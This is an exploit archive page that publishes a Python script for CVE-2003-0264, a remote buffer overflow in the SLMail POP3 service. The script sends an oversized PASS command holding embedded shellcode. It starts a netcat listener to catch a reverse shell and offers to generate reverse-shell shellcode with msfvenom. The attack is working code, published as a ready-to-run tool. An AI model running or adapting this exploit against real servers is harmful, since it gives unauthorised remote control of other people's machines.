exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

SLMail 5.1.0.4420 Remote Code Execution

SLMail 5.1.0.4420 Remote Code Execution
Posted Feb 24, 2021
Authored by mednic | Site github.com

SLMail version 5.1.0.4420 remote code execution exploit.

tags | exploit, remote, code execution
advisories | CVE-2003-0264
SHA-256 | f547b0e564ad998d91976d1ed61dd02d0fc085b65dfaace5584455de5438b2a2

SLMail 5.1.0.4420 Remote Code Execution

Change Mirror Download
# -*- coding: utf-8 -*-
import socket
from time import sleep
from os import system

system("clear")
print 'Shell-code-foi-informada?\r\n'
print '[1] sim'
print '[2] nao\n'
quest = int(input('>>> '))

def main():
system("clear")
#============================
#--ensira-sua-shell-code-aqui

buf = ""
buf += "\xb8\xaa\x62\xd3\xea\xda\xd4\xd9\x74\x24\xf4\x5e\x29"
buf += "\xc9\xb1\x52\x31\x46\x12\x03\x46\x12\x83\x44\x9e\x31"
buf += "\x1f\x64\xb7\x34\xe0\x94\x48\x59\x68\x71\x79\x59\x0e"
buf += "\xf2\x2a\x69\x44\x56\xc7\x02\x08\x42\x5c\x66\x85\x65"
buf += "\xd5\xcd\xf3\x48\xe6\x7e\xc7\xcb\x64\x7d\x14\x2b\x54"
buf += "\x4e\x69\x2a\x91\xb3\x80\x7e\x4a\xbf\x37\x6e\xff\xf5"
buf += "\x8b\x05\xb3\x18\x8c\xfa\x04\x1a\xbd\xad\x1f\x45\x1d"
buf += "\x4c\xf3\xfd\x14\x56\x10\x3b\xee\xed\xe2\xb7\xf1\x27"
buf += "\x3b\x37\x5d\x06\xf3\xca\x9f\x4f\x34\x35\xea\xb9\x46"
buf += "\xc8\xed\x7e\x34\x16\x7b\x64\x9e\xdd\xdb\x40\x1e\x31"

#===========================

print 'Exploit - CVE-2003-0264\nplatfor: windows\nPOP3 SLmail-5.5 overflow :)'
print '\nby: - Mednic -\r\n'
host = raw_input('Host: ')

buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "\x90" * 39 + buf

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

sleep(3)
print '\nIniciando conexão ao servidor...\n'
sleep(2)
try:
s.connect((host, 110))
s.recv(1024)
except:
print 'Conexão recusada !'
exit()
s.settimeout(1)
print '\nEnviando usuario...\n'
s.send("USER guest\r\n")
s.recv(1024)
s.settimeout(1)
print '\nIniciando estouro de buffer...\n'
system('nc -nlvp 444')
s.send("PASS "+buffer+"\r\n")
s.recv(1024)
s.send("QUIT\r\n")
s.close()

if quest == 1:
main()

elif quest == 2:
print "IP para conexão reversa !"
ip = raw_input('>>> ')
system('clear')
system('msfvenom -p windows/shell_reverse_tcp LHOST='+ip+" LPORT=444 -b "+'\\x00\\x0a\\x0d\\x20'+" -f python")
print '\r\nCopie e substitua pelo setado no codigo !'
else:
print 'Invalido argumento'
exit()
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close